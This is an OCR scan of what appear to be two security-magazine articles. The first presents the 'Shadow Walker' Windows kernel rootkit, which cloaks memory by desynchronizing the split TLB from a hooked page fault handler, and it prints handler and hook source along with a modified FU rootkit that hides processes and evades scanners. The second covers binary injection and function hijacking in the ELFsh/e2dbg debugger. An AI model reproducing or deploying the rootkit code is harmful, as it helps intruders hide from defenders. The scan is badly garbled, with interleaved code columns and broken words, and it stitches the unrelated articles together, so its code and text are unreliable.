address. If the instruction pointer equals the faulting address, then it is 
an execute access. Otherwise, it is a read / write. As the OS uses the 
present bit in memory management, we also need to differentiate between 
page faults due to our memory hook and normal page faults. The simplest 
way is to require that all hooked pages either reside in non paged memory 
or be explicitly locked down via an API like MmProbeAndLockPages. 


The next issue concerns how to "fake" the EXECUTE and READ / WRITE accesses 
when we detect them (and do so with a minimal performance hit). In this 
case, the Pentium TLB architecture comes to the rescue. The pentium 
possesses a split TLB with one TLB for instructions and the other for data. 
As mentioned previously, the TLB caches the virtual to physical page frame 
mappings when virtual memory is enabled. Normally, the ITLB and DTLB are 
synchronized and hold the same physical mapping for a given page. Though 
the TLB is primarily hardware controlled, there are several software 
mechanisms for manipulating it. 


- Reloading cr3 causes all TLB entries except global entries to be 
flushed. This typically occurs on a context switch. 

-— The invlpg causes a specific TLB entry to be flushed. 

— Executing a data access instruction causes the DTLB to be loaded with 
the mapping for the data page that was accessed. 

- Executing a call causes the ITLB to be loaded with the mapping for the 


page containing the cod xecuted in response to the call. 


We can filter execute accesses from read / write accesses and fake them by 
desynchronizing the TLB’s such that the ITLB holds a different virtual to 
physical mapping than the DTLB. This process is performed as follows: 


First, a new page fault handler is installed to handle the cloaked page 
accesses. Then the page-to-be-hooked is marked not present and it’s 

TLB entry is flushed via the invlpg instruction. This ensures that all 
subsequent accesses to the page will be filtered through the installed 
page fault handler. Within the installed page fault handler, we determin 
whether a given memory access is due to an execute or read/write by 


comparing the saved instruction pointer with the faulting address. If they 
match, the memory access is due to an execute. Otherwise, it is due toa 
read / write. The type of access determines which mapping is manually 


loaded into the ITLB or DTLB. Figure 5 provides a conceptual view 
of this strategy. 


Lastly, it is important to note that TLB access is much faster than 
performing a page table lookup. In general, page faults are costly. 
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Therefore, at first glance, it might appear that marking the hidden pages 
not present would incur a significant performance hit. This is, in fact, 
not the case. Though we mark the hidden pages not present, for most memory 
accesses we do not incur the penalty of a page fault because th ntries 
are cached in the TLB. The exceptions are, of course, the initial faults 
that occur after marking the cloaked page not present and any subsequent 
faults which result from cache line evictions when a TLB set becomes full. 
Thus, the primary job of the new page fault handler is to explicitly and 
selectively load the DTLB or ITLB with the correct mappings for hidden 
pages. All faults originating on other pages are passed down to the 
operating system page fault handler. 


rootkit code FRAME 1 
Is ita / > 
code | 
access? ITLB | FRAME 2 
/ > / 
| VPN=12 
| Frame=1 FRAME 3 
| 
| 
MEMORY PAGE TABLES FRAME 4 
ACCESS 
VPN=12 
| FRAME 5 
| 
| 
| DTLB random garbage FRAME 6 
| > > 
Is it a VPN=12 
data Frame=6 FRAME N 
access? 


[ Figure 5 - Faking Read / Writes by Desynchronizing the Split TLB ] 
—---[ 3.2 - Hiding Pure Data 


Hiding data modifications is significantly less optimal than hiding code 
modifications, but it can be accomplished provided that one is willing to 
accept the performance hit. We cause a minimal performance loss when 
hiding executable code by virtue of the fact that the ITLB can maintain a 
different mapping than the DTLB. Code can execute very fast with a minimum 
of page faults because that mapping is always present in the ITLB (except 
in the rar vent the ITLB entry gets evicted from the cache). 
Unfortunately, in the case of data we can’t introduce any such 
inconsistency. There is only 1 DTLB and consequently that DTLB has to be 
kept empty if we are to catch and filter specific data accesses. The end 
result is 1 page fault per data access. This is not be a big problem in 
terms of hiding a specific driver if the driver is carefully designed and 
uses a minimum of global data, but the performance hit could be formidable 
when trying to hide a frequently accessed data page. 


For data hiding, we have used a protocol based approach between the hidden 
driver and the memory hook. We use this to show how one might hide global 
data in a rootkit driver. In order to allow the memory access to go throug 
the DTLB is loaded in the page fault handler. In order to enforce th 
correct filtering of data accesses, however, it must be flushed immediately 
by the requesting driver to ensure that no other code accesses that memory 
address and receives the data resulting from an incorrect mapping. 

The protocol for accessing data on a hidden page is as follows: 


1. The driver raises the IRQL to DISPATCH_LEVEL (to ensure that no other 
code gets to run which might see the "hidden" data as opposed to the 
"fake" data). 
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2. The driver must explicitly flush the TLB entry for the page containing 
the cloaked variable using the invlpg instruction. In the event that 
some other process has attempted to access our data page and been 
served with the fake frame (i.e. we don’t want to receive the fak 
mapping which may still reside in the TLB so we clear it to be sure). 


3. The driver is allowed to perform the data access. 


4. The driver must explicitly flush the TLB entry for the page containing 
the cloaked variable using the invlpg instruction (i.e. so that the 
"real" mapping does not remain in the TLB. We don’t want any other 
drivers or processes receiving the hidden mapping so we clear it). 


5. The driver lowers the IROL to the previous level before it was raised. 


The additional restriction also applies: 


- No global data can be passed to kernel API functions. When calling an 
API, global data must be copied into local storage on the stack and 
passed into the API function (i.e. if the API accesses the cloaked 
variable it will receive fake data and perform incorrectly). 


This protocol can be efficiently implemented in the hidden driver by having 
the driver copy all global data over into local variables at the beginning 
of the routine and then copy the data back after the function body has 
completed executing. Because stack data is in a constant state of flux, it 
is unlikely that a signature could be reliably obtained from global data 
on the stack. In this way, there is no need to cause a page fault on every 
global access. In general, only one page fault is required to copy over the 
data at the beginning of the routine and one fault to copy the data back at 
the end of the routine. Admittedly, this disregards more complex issues 
involved with multithreaded access and synchronization. An alternative 
approach to using a protocol between the driver and PF handler would 

be to single step the instruction causing the memory access. This would 

be less cumbersome for the driver and yet allow the PF handler to maintain 
control of the DTLB (ie. to flush it after the data access so that it 
remains empty). 


—---[ 3.3 - Related Work 


Ironically, the memory cloaking technology discussed in this article is 
derived from an existing stack overflow protection scheme known as Pax 

As such, we demonstrate a potentially offensive application of an 
originally defensive technology. Though very similar (i.e. taking advantage 
of the Pentium split TLB architecture), there are subtle differences 
between PaX and the rootkit application of the technology. Whereas our 
memory cloaked rootkit enforces execute, diverted read / write semantics, 
PaX enforces read / write, no execute semantics. This enables PaX to 
provide software support for a non executable stack under the IA-32 
architecture, thereby thwarting a large class of stack based buffer 
overflow attacks. When a PaX protected system detects an attempted execut 
in a read / write only range of memory, it terminates the offending 
process. Hardware support for non executable memory has subsequently been 
added to the page tabl ntry format for some processors including IA-64 
and pentium 4. In contrast to PaX, our rootkit handler allows 

execution to proceed normally while diverting read / write accesses to 

the hidden page off to an innocent appearing shadow page. Finally, it should 
be noted that PaX uses the PTE user / supervisor bit to generate the 

page faults required to enforce its protection. This limits it to protection 
of solely user mode pages which is an impractical limitation for a 

kernel mode rootkit. As such, we use the PTE present / not present bit 

in our implementation. 


----[ 3.4 - Proof Of Concept Implementation 


Our current implementation uses a modified FU rootkit and a new page fault 
handler called Shadow Walker. Since FU alters kernel data structures to 
hide processes and does not utilize any code hooks, we only had to be 


8.txt Wed Apr 26 09:43:45 2017 13 


concerned with hiding the FU driver in memory. The kernel accounts for 
every process running on the system by storing an object called an EPROCESS 
block for each process in an internal linked list. FU disconnects the 
process it wants to hide from this linked list. 


SaaS [ 3.4.a - Modified FU Rootkit 


We modified the current version of the FU rootkit taken from rootkit.com. 
In order to make it more stealthy, its dependence on a userland 
initialization program was removed. Now, all setup information in the form 
of OS dependant offsets are derived with a kernel level function. By 
removing the userland portion, we eliminated the need to create a symbolic 
link to the driver and the need to create a functional device, both of 
which are easily detected. Once FU is installed, its image on the file 
system can be deleted so all anti-virus scans on the file system will fail 
to find it. You can also imagine that FU could be installed from a kernel 
exploit and loaded into memory thereby avoiding any image on disk 
detection. Also, FU hides all processes whose names are prefixed with 
_fu_ regardless of the process ID (PID). We create a System thread that 
continually scans this list of processes looking for this prefix. FU and 
the memory hook, Shadow Walker, work in collusion; therefore, FU relies on 
Shadow Walker to remove the driver from the linked list of drivers in 
memory and from the Windows Object Manager’s driver directory. 


ts 


----[ 3.4.b - Shadow Walker Memory Hook Engine 


Shadow Walker consists of a memory hook installation module and a new page 
fault handler. The memory hook module takes the virtual address of the 

page to be hidden as a parameter. It uses the information contained in the 
address to perform a few sanity checks. Shadow Walker then installs the new 
page fault handler by hooking Int OE (if it has not been previously 
installed) and inserts the information about the hidden page into a hash 
table so that it can be looked up quickly on page faults. Lastly, the PTE 
for the page is marked non present and the TLB entry for the hidden pag 
is flushed. This ensures that all subsequent accesses to the page are 
filtered by the new page fault handler. 


[BORK RR KKK KK KK I I I I I I I A OK I OK 


* HookMemoryPage - Hooks a memory page by marking it not present 

iad and flushing any entries in the TLB. This ensure 

* that all subsequent memory accesses will generate 

* page faults and be filtered by the page fault handler. 
* 

* Parameters: 

ig PVOID pExecutePage - pointer to the page that will be used on 

% execute access 

* 

x PVOID pReadWritePage - pointer to the page that will be used to load 
% the DTLB on data access x 

* 

* PVOID pfnCallIntoHookedPage - A void function which will be called 
* from within the page fault handler to 
% to load the ITLB on execute accesses 
* 

- PVOID pDriverStarts (optional) - Sets the start of the valid range 
i for data accesses originating from 
* within the hidden pag 

* 

> PVOID pDriverEnds (optional) - Sets the end of the valid range for 
. data accesses originating from within 
* the hidden pag 

* Return —- None 

* 


HK AR I I I I I A I OR OR / 
void HookMemoryPage( PVOID pExecutePage, PVOID pReadWritePage, 


PVOID pfnCallIntoHookedPage, PVOID pDriverStarts, 
PVOID pDriverEnds ) 


HOOKED_LIST_ENTRY HookedPage = {0}; 
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HookedPage.pE 


xecuteView = pExecutePage; 


HookedPage.pReadWriteView = pReadWritePage; 


HookedPage.pf 
if( pDriverSt 
HookedPage 

else 
HookedPage 
if( pDriverEn 
HookedPage 

else 
{ //set 
tf (CE 


Ho 
(U 
else 
Ho 
(U 
}//end if 


—_asm cli //d 


nCalliIntoHookedPage = pfnCallIntoHookedPage; 
arts != NULL) 


-pDriverStarts = (ULONG) pDriverStarts; 
-pDriverStarts = (ULONG) pExecutePage; 

ds != NULL) 

.pDriverEnds = (ULONG) pDriverEnds; 

by default if pDriverEnds is not specified 
sInLargePage( pExecutePage ) ) 
okedPage.pDriverEnds = 

LONG) HookedPage.pDriverStarts + LARGE_PAGE_SIZE; 
okedPage.pDriverEnds = 

LONG) HookedPage.pDriverStarts + PAGE_SIZE; 


isable interrupts 


if( hooked == false ) 
{ HookIint ( &g_OldInt0OEHandler, 
(unsigned long)NewIntOEHandler, Ox0OE ); 
hooked = true; 
}//end if 
HookedPage.pExecutePte = GetPteAddress( pExecutePage ); 
HookedPage.pReadWritePte = GetPteAddress( pReadWritePage ); 


//Insert th 
PushPageIntoH 


/Enable the 
nableGlobalP 


GJ 


aN 


//Mark the pa 
MarkPageNotPr 


//Go ahead an 
//subsequent 
//through our 
__asm invlpg 


__asm sti //r 


}//end HookMemoryPage 


hooked page into the list 
ookedList ( HookedPage ); 


global page feature 
ageFeature( HookedPage.pExecutePte ); 


ge non present 
esent ( HookedPage.pExecutePte ); 


d flush the TLBs. We want to guarantee that all 
accesses to this hooked page are filtered 

new page fault handler. 

pExecutePage 


eenable interrupts 


The functionality of the page fault handler is relatively straight forward 


despit 


the seeming c 


omplexity of the scheme. Its primary functions are 


to determine if a given page fault is originating from a hooked page, 

the access type, and then load the appropriate TLB. As such, the 
page fault handler has basically two execution paths. If the page is 
unhooked, it is passe 
This is determined as quickly and efficiently as possible. Faults 
originating from user mode addresses or while the processor is running in 


resolv 


user mod 


d down to the operating system page fault handler. 


are immedia 


tely passed down. The fate of kernel mode accesses is 


also quickly decided via a hash table lookup. Alternatively, once the page 


has b 


the appropriate TLB 1 


whil 


n determined to be hooked the access type is checked and directed to 


oading code (Execute accesses will cause a ITLB load 


loading is as follows 


1. 


23 


Ww 


For a DTLB load, a 
For an ITLB load, 


le Read / Write accesses cause a DTLB load). The procedure for TLB 


[The appropriate physical frame mapping is loaded into the PTE for the 
faulting address. 
The page is temporarily marked present. 


memory read on the hooked page is performed. 
a call into the hooked page is performed. 
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5. The page is marked as non present again. 


= 


6. The old physical frame mapping for the PTE is restored. 


After TLB loading, control is directly returned to the faulting code. 


[BORK KR KKK KK KK RI I I I OK I OR KK AK 


void __declspec( naked ) NewIntQEHandler (void) 
__asm 


pushad 


jnz PassDown //pass it down 


cmp eax, HIGHEST_USER_ADDRESS 


TITTTTTTTTTTTTAA TATA 


//Determine if it’s a hooked page 


TITTTTTTTTTTTTAAAA ATA AAA TAA AAA TTT 


push eax 
call FindPageInHookedList 


mov ebp, eax //pointer to HOOKED_PAGE structure 


cmp ebp, ERROR_PAGE_NOT_IN_LIST 
jz PassDown //it’s not a hooked page 


TITIITLTTTTATTI TATA ATTA AAI ATTA TAT 
//NOTE: At this point we know it’s a 
//hnooked page. We also only hook 
//kernel mode pages which are either 
//non paged or locked down in memory 
//so we assume that all page tables 
//are resident to resolve the address 
//from here on out. 
LITIITITTITIATS TAAL TAIT ATTA AAT TT 
mov eax, cr2 
mov esi, PROCESS_PAGE_DIR_BASE 
mov ebx, eax 

shr ebx, 22 

lea ebx, [esi + ebx*4] //ebx = pPTE for 


mov edx, dword ptr [espt+0x20] //PageFault.! 


jbe PassDown //we don’t hook user pages, 


mov eax,cr2 //faulting virtual address 


large 


test [ebx], 0x80 //check if its a 
jnz IsLargePage 


mov esi, PROCESS PAGE TABLE BASE 
mov ebx, eax 

shr ebx, 12 

lea ebx, [esi + ebx*4] //ebx = pPT 


Gl 


IsLargePage: 


large 


* NewIntOEHandler - Page fault handler for the memory hook engine (aka. the 
* guts of this whole thing ;) 

* 

* Parameters — none 

* 

* Return — none 

* 

* 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


ErrorCode 


test edx, 0x04 //if the processor was in user mode, then 


pass it down 


page 
page 


cmp [esp+0x24], eax //Ts due to an attepmted execute? 


jne LoadDTLB 


TITTTTTTTTTTTTTAT TAA ATTTTT 


// It’s due to an execute. Load 
// up the ITLB. 
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LoadDTLB: 


LoadFakeFrame: 


LITIITITTSTTATS TATA TATA TTT 

cli 

or dword ptr [ebx], 0x01 //mark the page present 
call [ebp].pfnCallIntoHookedPage //load the itlb 

and dword ptr [ebx], OxFFFFFFFE //mark page not present 
sti 

jmp ReturnWithoutPassdown 


LITIITLTTSTITTITA AAI ATSTAAATT TT 
// It’s due to a read /write 

// Load up the DTLB 
LITTITITTSTIATTTA AAI TATA 
TITTITLTTITSTTITA AAAS ATTA 
// Check if the read / write 

// is originating from code 

// on the hidden page. 
TITIITLTTSTSATSTA AAS 


mov edx, [esp+0x24] //eip 
cmp edx, [ebp].pDriverStarts 

jb LoadFakeFrame 

cmp edx, [ebp] .pDriverEnds 

ja LoadFakeFrame 


TITLILSITLTTTTTTLTT TTT TAT 

// If the read /write is originating 
// from code on the hidden page,then 
// let it go through. The code on the 
// hidden page will follow protocol 
// to clear the TLB after the access. 
TITITLSTILTTTT SATS ATT TSAI ST 


cli 

or dword ptr [ebx], 0x01 //mark the page present 
mov eax, dword ptr [eax] //load the DTLB 

and dword ptr [ebx], OxFFFFFFFE //mark page not present 
sti 


jmp ReturnWithoutPassdown 


TITIITITTSTSITSTA TTA TA AAA TTT 

// We want to fake out this read 

// write. Our code is not generating 
jf 
ZITTITLTISTTATTTATTI ATTA ATTA TTT 


mov esi, [ebp] .pReadWritePte 
mov ecx, dword ptr [esi] //ecx = PTE of the 
//cead / write page 


//creplace the frame with the fake one 

mov edi, [ebx] 

and edi, Ox00000FFF //preserve the lower 12 bits of the 
//faulting page’s PTE 

and ecx, OxFFFFFO00 //isolate the physical address in 
//the "fake" page’s PTE 


or ecx, edi 


mov edx, [ebx] //save the old PTE so we can replace it 

cli 

mov [ebx], ecx //replace the faulting page’s phys frame 
//address w/ the fake one 


//load the DTLB 

or dword ptr [ebx], 0x01 //mark the page present 

mov eax, cr2 //faulting virtual address 

mov eax, dword ptr[eax] //do data access to load DTLB 
and dword ptr [ebx], OxFFFFFFFE //re-mark page not present 


//Finally, restore the original PTE 
mov [ebx], edx 
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sti 


ReturnWithoutPassDown: 
popad 
add esp, 4 
iretd 


PassDown: 
popad 
jmp g_OldInt0OEHandler 


}//end asm 
}//end NewInt0E 


--[ 4 - Known Limitations & Performance Impact 


As our current rootkit is intended only as a proof of concept 
demonstration rather than a fully engineered attack tool, it possesses 
a number of implementational limitations. Most of this functionality 
could be added, were one so inclined. First, there is no effort to 
support hyperthreading or multiple processor systems. Additionally, 
it does not support the Pentium PAE addressing mode which extends 

the number of physically addressable bits from 32 to 36. Finally, the 
design is limited to cloaking only 4K sized kernel mode pages 

(i.e. in the upper 2 GB range of the memory address space). We mention 
the 4K page limitation because there are currently some technical 
issues with regard to hiding the 4MB page upon which ntoskrnl resides. 
Hiding the page containing ntoskrnl would be a noteworthy extension. 
rT 
s 
t 
Pp 


n terms of performance, we have not completed rigorous testing, but 
ubjectively speaking there is no noticeable performance impact after 
he rootkit and memory hooking engine are installed. For maximum 
erformance, as mentioned previously, code and data should remain 

on separate pages and the usage of global data should be minimized 

to limit the impact on performance if one desires to enable both 

data and executable page cloaking. 


-—-[ 5 - Detection 


There are at least a few obvious weaknesses that must be dealt with to 
avoid detection. Our current proof of concept implementation does not 
address them, however, we note them here for the sake of completeness. 
Because we must be able to differentiate between normal page faults and 
those faults related to the memory hook, we impose the requirement that 
hooked pages must reside in non paged memory. Clearly, non present pages 
in non paged memory present an abnormality. Weather or not this is a 
sufficient heuristic to call a rootkit alarm is, however, debatable. 
Locking down pagable memory using an API like MmProbeAndLockPages is 
probably more stealthy. The next weakness lies in the need to disguise 

the presence of the page fault handler. Because the page where the pag 
fault handler resides cannot be marked non present due to the obvious 
issues with recursive reentry, it will be vulnerable to a simple signature 
scan and must be obsfucated using more traditional methods. Since this 
routine is small, written in ASM, and does not rely upon any kernel API’s, 
polymorphism would be a reasonable solution. A related weakness 
arises in the need to disguise the presence of the IDT hook. We cannot use 
our memory hooking technique to disguise the modifications to the 
interrupt descriptor table for similar reasons as the page fault handler. 
While we could hook the page fault interrupt via an inline hook rather 
than direct IDT modification, placing a memory hook on the page 

containing the OS’s INT OE handler is problematic and inline hooks 

are easily detected. Joanna Rutkowska proposed using the debug registers 
to hide IDT hooks [5], but Edgar Barbosa demonstrated they are not a 
completey effective solution [12]. This is due to the fact that debug 
registersprotect virtual as opposed to physical addresses. One may simply 
remap the physical frame containing the IDT to a different virtual address 
and read / write the IDT memory as one pleases. Shadow Walker falls prey 
to this type of attack as well, based as it is, upon the exploitation 
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of virtual 
weakness, 
rather than physical memory scans and 


Shadow Walker 


18 


l rather than physical memory. Despite this aknowleged 
most commercial security scanners still 


l perform virtual 
be fooled by rootkits like 
insidious. Even if a scanner 


will 
is 


Shadow Walker. Finally, 
detects Shadow Walker, it will 


be virtual] 


y helpless to remove it ona 


running system. Were it to successfull 
original OS page fault handler, 
system because ther 


for exam 
would be some page 


over-write the hook with the 
ple, it would likely BSOD the 
faults occurring on the hidden 


LY 


pages which neither it nor the OS woul 


6 — Conclusion 


== 


Shadow Walker is not a weaponized attack tool. 


ld know how to handle. 


Its functionality is 


limited and it makes no effort to hide it’s hook on the IDT or its page 


fault handler code. 


imp] 


operating system and al 
exploitation of the TLB architecture, 
exhibits an extremely 
will 
spyware applications 
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Sa aa ee [ I. Hardened software debugging introduction 


In the past, binary manipulation work has focussed on virii 
writing, software cracking, backdoors deployment, or creation of 
tiny or obfuscated executables. Besides the tools from the GNU 
project such as the GNU binutils that includes the GNU debugger [1] 
(which focus more on portability than functionalities), no major 
binary manipulation framework does exist. For almost ten years, 
the ELF format has been a success and most UNIX Operating Systems 
and distributions rely on it. 


However, the existing tools do not take advantage of the format 
and most of the revers ngineering or debugging softwares are 
either very architecture specific, or simply do not care about 
binary internals for extracting and redirecting information. 


Since our first published work on the ELF shell, we improved so 
much the new framework that it is now time to publish a second 
deep article focussing on advances in static and runtime 

ELF techniques. We will explain in great details the 8 new 
binary manipulation functionalities that intersect with the 
existing revers ngineering methodology. Those techniques allow 
for a new type of approach on debugging and extending closed 
source software in hardened environments. 


We worked on many architectures (x86, alpha, sparc, mips) and 
focussed on constrained environments where binaries are linked 
for including security protections (such as hardened gentoo 
binaries) in Pax [2] protected machines. It means that our 
debugger can stay safe if it is injected inside a (local or) 
remote process. 
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Previous work & limits 


In the first part of the Cerberus articles serie, we introduced 
a new residency technique called ET_REL injection. It consisted 
in compiling C code into relocatable (.0o) files and injecting 
them into existing closed source binary programs. This technique 
was proposed for INTEL and SPARC architectures on the ELF32 


format. 


We improved this technique so that both 32 and 64 bits binaries 
are supported so we added alpha64 and sparc64 support. We also 
worked on the MIPS r5000 architecture and now provide a nearly 
complete environment for it as well. We now also allow for ET_REL 
injection into ET_DYN objects (shared libraries) so that our 
technique is compatible with fully randomized environments such 
as provided by Hardened Gentoo with the PaX protection enabled 

on the Linux Operating System. We also worked on other OS such as 
BSD based ones, Solaris, and HP-UX and the code was compiled and 
tested regulary on those as well. 


A major innovation of our binary manipulation based debugging 
framework is the absence of ptrace. We do not use kernel residency 
like in [8] so that even unprivilegied users can use this and it 
is not Operating System dependent. 


Existing debuggers use to rely on the ptrace system call so that 
the debugger process can attach the debuggee program and enable 
various internal processes manipulations such as dumping memory, 
putting breakpoints, backtracing, and so on. We propose the same 
features without using the system call. 


The reasons why we do not use ptrace are multiple and simple. 
First of all, a lot of hardened or embedded systems do not 
implement it, or just disable it. That’s the case for grsecurity 
based systems, production systems, or phone systems whoose 
Operating System is ELF based but without a ptrace interface. 


The second major reason for not using ptrace is the performance 
penalties of such a debugging system. We do not suffer from 
performance penalties since the debugger resides in the same 
process. We provide a full userland technique that does not have 
to access the kernel memory, thus it is useful in all stages of 
a penetration testing when debugging sensitive software on 
hardened environment is needed and no system update is possible. 


We allow for plain C code injection inside new binary files (in 

the static perspective) and processes (in the runtime mode) using 

a unified software. When requested, we only use ELF techniques that 
reduce forensics evidences on the disk and only works in memory. 


Beyond PaX and ptrace 


Another key point in our framework are the greatly improved 
redirection techniques. We can redirect almost all control flow, 
wether or not the function code is placed inside the binary 
itself (CFLOW technique) or in a library on which the binary 
depends (Our previous work presented new hijacking techniques 
such that ALTPLT). 


We improved this techniques and passed through many rewrites 
and now allow a complete architecture independant implementation. 
We completed ALTPLT by a new technique called ALTGOT so that 
hijacking a function and calling back the original copy from the 
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hooking function is possible on Alpha and Mips RISC machines as 
well. 


We also created a new technique called EXTPLT which allow for 
unknown function (for which no dynamic linking information is 
available at all in the ELF file) using a new postlinking 
algorithm compatible with ET_EXEC and ET_DYN objets. 


----[ C. Interface improvements 


Our Embedded ELF debugger implementation is a prototype. 
Understand that it is really usable but we are still in the 
development process. All the code presented here is known to 
work. However we are not omniscient and you might encounter a 
problem. In that case, drop us an email so that we can figure 
out how to create a patch. 


The only assumption that we made is the ability to read the 
debuggee program. In all case, you can also debug in memory 
the unreadable binaries on disk by loading the debugger using 


the LD_PRELOAD variable. Nevertheless, e2dbg is enhanced 

when binary files are readable. Because the debugger run in the 
same address space, you can still read memory [3] [4] and 
restore the binary program even though we do not implement it 
yet. 


The central communication language in the Embedded ELF Debugger 
(e2dbg) framework is the ELFsh scripting language. We augmented 
it with loop and conditional control flow, transparent support 
for lazy typed variables (like perl). The source command (for 
executing a script inside the current session) and user-defined 
macros (scriptdir command) are also supported. 


We also developed a peer2peer stack so called Distributed 
Update Management Protocol - DUMP - that allow for linking 
multiple debugger instances using the network, but this 
capability is not covered by the article. For completeness, we 
now support multiusers (parallel or shared) sessions and 
environment swapping using the workspace command. 


We will go through the use of such interface in the first part 
of the paper. In the second part, we give technical details 
about the implementation of such features on multiple 
architectures. The last part is dedicated to the most recent 

and advanced techniques we developed in the last weeks for 
constrained debugging in protected binaries. The last algorithms 
of the paper are architecture independant and constitute the 
core of the relocation engine in ELFsh. 


—------- [ It.. Th mbedded debugging playground 


---[ A. In-process injection 


We have different techniques for injecting the debugger 
inside the debugg process. Thus it will share the address 
space and the debugger will be able to read its own data 
and code for getting (and changing) information in the 
debugg process. 


Because the ELF shell is composed of 40000 lines of code, 
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we did not want to recode everything for allowing process 
modification. We used some trick that allow us to select 
wether the modifications are done in memory or on disk. The 


trick consists in 1 


macros not beeing mandatory, 


(libelfsh/section.c) 


========= BEGIN DUMP 0 === 


void 


ELFSH_PROFILE_IN(__FILE 


O lines of code. Considering the 


*elfsh_get_raw(elfshsect_t *sect) 


, FUNCTION__, LINE__); 


/* sect->parent->base is always NULL for ET_EXEC */ 


if (elfsh_is_debug_mode ( 
{ 


)) 


PROF ILI 


GJ 


here is the exact stuff 


sect->pdata = (void *) sect-—>parent-—>base + sect-—>shdr->sh_addr; 
ELF SH_PROFILE_ROUT(__FILE__, FUNCTION__, LINE__, (sect-—>pdata)); 
if (sect) 
iF SH_PROFILE_ROUT(__FILE__, FUNCTION__, LINE__, (sect->data)); 


A 


ELFSH_PROFILE_ERR(__FILE__, FUNCTION__, LINE, 


"Invalid parameter", NULL); 


=== END DUMP 0 ========= 


What is the technique about ? It is quite simple : if the debugger 
internal flag is set to static mode (on-disk modification), then we 
return the pointer on the ELFsh internal data cache for the section 
data we want to access. 


However if we are in dynamic mode (process modification), then we 
just return the address of that section. The debugger runs in the 
same process and thus will think that the returned address is a 
readable (or writable) buffer. We can reuse all the ELF shell 

API by just taking care of using the elfsh_get_raw() function when 
accessing the ->data pointer. The process/ondisk selection is then 
transparent for all the debugger/elfsh code. 


The idea of injecting code directly inside the process is not 

new and we studied it for some years now. Embedded code injection 
is also used in the Windows cracking community [12] for bypassing 

most of the protections against tracing and debugging, but nowhere 
lse we have seen an implementation of a full debugger, capable 

of such advanced features like ET_REL injection or function 

redirection on multiple architectures, both on disk and in memory, 

with a single code. 


Alternate ondisk and memory ELF scripting (feat. linkmap) 


We have 2 approaches for inserting the debugger inside the debugg 
program. When using a DT_NEEDED entry and redirecting the main 
debuggee function onto the main entry point of the ET_DYN debugger, 
we also inject various sections so that we can perform core 
techniques such as EXTPLT. That will be described in details in 
the next part. 


The second approach is about using LD_PRELOAD on the debuggee 
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program and putting breakpoints (either by O0xCC opcode on x86 or 
the equivalent opcode on another architecture, or by function 
redirection which is available on many architectures and for many 
kind of functions in the framework). 


Since binary modification is needed anyway, we are using the 
DT_NEEDED technique for adding the library dependance, and all 
other sections injections or redirection described in this article, 
before starting the real debugging. 


The LD_PRELOAD technique is particulary more useful when you 
cannot read the binary you want to debug. It is left to the user 
the choice of debugger injection technique, depending on the needs 
of the moment. 


Let’s see how to use th mbedded debugger and its ’/mode’ command 
that does the memory/disk selection. Then we print the Global 
Offset Table (.got). First the memory GOT is displayed, then we 
get back in static mode and the ondisk GOT is printed 


=== BEGIN DUMP 1 ========= 


(e2dbg-0.65) list 


f Working files .::. 

001] Sun Jul 31 19:23:33 2005 D ID: 9 /lib/libncurses.so.5 
002] Sun Jul 31 19:23:33 2005 D ID: 8 /lib/libdl.so.2 

003] Sun Jul 31 19:23:33 2005 D ID: 7 /lib/libtermcap.so.2 
004] Sun Jul 31 19:23:33 2005 D ID: 6 /lib/libreadline.so.5 
005] Sun Jul 31 19:23:33 2005 D ID: 5 /lib/libelfsh.so 

006] Sun Jul 31 19:23:33 2005 D ID: 4 /lib/ld-linux.so.2 
007] Sun Jul 31 19:23:33 2005 D ID: 3 ./ibc.so.6 e2dbg.so renamed 
008] Sun Jul 31 19:23:33 2005 D ID: 2 /lib/tls/libc.so.6 
009] Sun Jul 31 19:23:33 2005 *D ID: 1 ./a.out_e2dbg debuggee 
-::. ELFsh modules . 

*] No loaded module 

(e2dbg-0.65) mode 

[*] e2dbg is in DYNAMIC MODE 

(e2dbg-0.65) got 

[Global Offset Table .::. GOT : .got ] 

[Object ./a.out_e2dbg] 
0x080498E4: [0] 0x00000000 <?> 

[Global Offset Table .::. GOT : .got.plt ] 

[Object ./a.out_e2dbg] 
0x080498E8: [0] 0x0804981C <_DYNAMIC@a.out_e2dbg> 
0x080498EC: [1] 0x00000000 <?> 
0x080498F0: [2] 0x00000000 <?> 
Ox080498F4: [3] 0x0804839E <fflush@a.out_e2dbg> 
Ox080498F8: [4] 0x080483AE <puts@a.out_e2dbg> 
Ox080498FC: [5] 0x080483BE <malloc@a.out_e2dbg> 
0x08049900: [6] 0x080483CE <strlen@a.out_e2dbg> 
0x08049904: [7] 0x080483DE <__libc_start_main@a.out_e2dbg> 
0x08049908: [8] 0x080483EE <printf@a.out_e2dbg> 
0x0804990C: [9] 0x080483FE <free@a.out_e2dbg> 
0x08049910: [10] 0x0804840E <read@a.out_e2dbg> 

[Global Offset Table .::. GOT : .elfsh.altgot ] 


[Object ./a.out_e2dbg] 
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0x08049928: [0] 0x0804981C <_DYNAMIC@a. out_e2dbg> 
0x0804992C: [1] OxB7F4A4E8 <_r_debug@ld-linux.so.2 + 24> 
0x08049930: [2] OxB7F3EECO <_dl_rtlid_di_serinfo@ld-linux.so.2 + 477> 
0x08049934: [3] 0x0804839E <fflush@a.out_e2dbg> 
0x08049938: [4] 0x080483AE <puts@a.out_e2dbg> 
0x0804993C: [5] OxB7E515F0 <__libc_malloc@libc.so.6> 
0x08049940: [6] 0x080483CE <strlen@a.out_e2dbg> 
0x08049944: [7] OxB7EO1E50 <__libc_start_main@libc.so.6> 
0x08049948: [8] 0x080483EE <printf@a.out_e2dbg> 
0x0804994C: [9] 0x080483FE <free@a.out_e2dbg> 
0x08049950: [10] 0x0804840E <read@a.out_e2dbg> 
0x08049954: [11] OxB/7DAFFF6 <e2dbg_run@ibc.so.6> 


(e2dbg-0.65) mode static 
[*] e2dbg is now in STATIC mode 


(e2dbg-0.65) # Here we switched in ondisk perspective 
(e2dbg-0.65) got 


[Global Offset Table .::. GOT : .got ] 
[Object ./a.out_e2dbg] 


0x080498E4: [0] 0x00000000 <?> 


[Global Offset Table .::. GOT : .got.plt ] 
[Object ./a.out_e2dbg] 


0Ox080498E8: [0] 0x0804981C <_DYNAMIC> 
0x080498EC: [1] 0x00000000 <?> 

0x080498F0: [2] 0x00000000 <?> 

0x080498F4: [3] 0x0804839E <fflush> 
Ox080498F8: [4] 0x080483AE <puts> 
Ox080498FC: [5] 0x080483BE <malloc> 
0x08049900: [6] 0x080483CE <strlen> 
